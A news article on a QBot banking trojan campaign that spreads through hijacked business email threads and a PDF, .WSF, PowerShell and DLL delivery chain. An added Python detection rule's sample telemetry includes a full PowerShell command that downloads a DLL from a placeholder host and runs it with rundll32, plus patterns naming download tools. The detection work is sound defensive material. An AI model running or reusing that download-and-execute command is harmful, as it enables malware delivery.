New QBot Banking Trojan Campaign Hijacks Business Emails to Spread Malware
A new QBot malware campaign leverages hijacked business correspondence to trick unsuspecting victims into installing malware, new findings from Kaspersky reveal.
The most recent activity, which started on April 4, 2023, mainly targets users in Germany, Argentina, Italy, Algeria, Spain, US, Russia, France, UK and Morocco.
QBot (aka Qakbot or Pinkslipbot) is a banking trojan that has been active since at least 2007. Besides stealing passwords and cookies from web browsers, it doubles as a backdoor used to inject next-stage payloads such as Cobalt Strike or ransomware.
Distributed via phishing campaigns, the malware has seen constant updates throughout its lifetime, packing anti-VM, anti-debugging, and anti-sandbox techniques to evade detection. It was also the most prevalent malware of March 2023, per Check Point.
“Initially, it was distributed via infected websites and pirated software,” Kaspersky researchers said, describing QBot's distribution methods. “Now bankers are delivered to potential victims via malware already on their computers, social engineering, and spam mail.”
Email thread hijacking attacks are nothing new. They happen when cybercriminals insert themselves into existing business conversations, or start new ones, using information previously harvested from compromised email accounts.
The goal is to induce victims to open a malicious link or malicious attachment, in this case, an attached PDF file disguised as a Microsoft Office 365 or Microsoft Azure warning.
Opening the document leads to the retrieval of an archive file from a compromised website, which in turn contains an obfuscated Windows Script File (.WSF). The script, for its part, embeds a PowerShell script that downloads a malicious DLL from a remote server. The downloaded DLL is the QBot malware itself.
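As an added illustration that is not part of Kaspersky's report or this article, the delivery chain just described (script host running a .WSF, spawning PowerShell that fetches and runs a DLL) can be expressed as a detection rule over process-creation telemetry. The event records below are constructed, and their field layout, the `ProcEvent` name and the `find_qbot_like_chains` function are assumptions of this example, not anything from the campaign.

```python
"""Detect the .WSF -> PowerShell -> DLL delivery chain in simplified
process-creation telemetry (Sysmon Event ID 1 style). Example only."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:          # assumed, simplified event shape
    pid: int
    ppid: int
    image: str            # executable name, lower-case
    cmdline: str          # full command line


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DLL_RUNNERS = re.compile(r"\b(rundll32|regsvr32)(\.exe)?\b", re.I)
DOWNLOAD_HINT = re.compile(
    r"(downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient)", re.I)


def find_qbot_like_chains(events):
    """Return (script_host_pid, powershell_pid, reason) for every PowerShell
    process whose parent is a script host that was launched with a .wsf file."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.image != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or parent.image not in SCRIPT_HOSTS:
            continue
        if ".wsf" not in parent.cmdline.lower():   # gate on the .WSF stage
            continue
        reasons = ["wsf->powershell"]
        if DOWNLOAD_HINT.search(e.cmdline):        # download stage
            reasons.append("download")
        if DLL_RUNNERS.search(e.cmdline) or ".dll" in e.cmdline.lower():
            reasons.append("dll")                  # DLL execution stage
        hits.append((parent.pid, e.pid, "+".join(reasons)))
    return hits


# Constructed sample telemetry; paths and hosts are placeholders, not IoCs.
SAMPLE = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "wscript.exe", 'wscript.exe "C:\\Users\\u\\Downloads\\doc.wsf"'),
    ProcEvent(300, 200, "powershell.exe", "powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/a.dll','C:\\ProgramData\\a.dll'); rundll32 C:\\ProgramData\\a.dll,print"),
    ProcEvent(400, 100, "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ProcEvent(500, 100, "cscript.exe", "cscript.exe check.vbs"),
    ProcEvent(600, 500, "powershell.exe", "powershell.exe Get-Date"),
]
```

Only the wscript.exe-with-.wsf parent and its PowerShell child (pids 200 and 300) are flagged; the benign PowerShell runs and the .vbs-launched one are not.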
The findings come as Elastic Security Labs uncovered a multi-stage social engineering campaign that uses weaponized Microsoft Word documents to distribute Agent Tesla and XWorm via a custom .NET-based loader.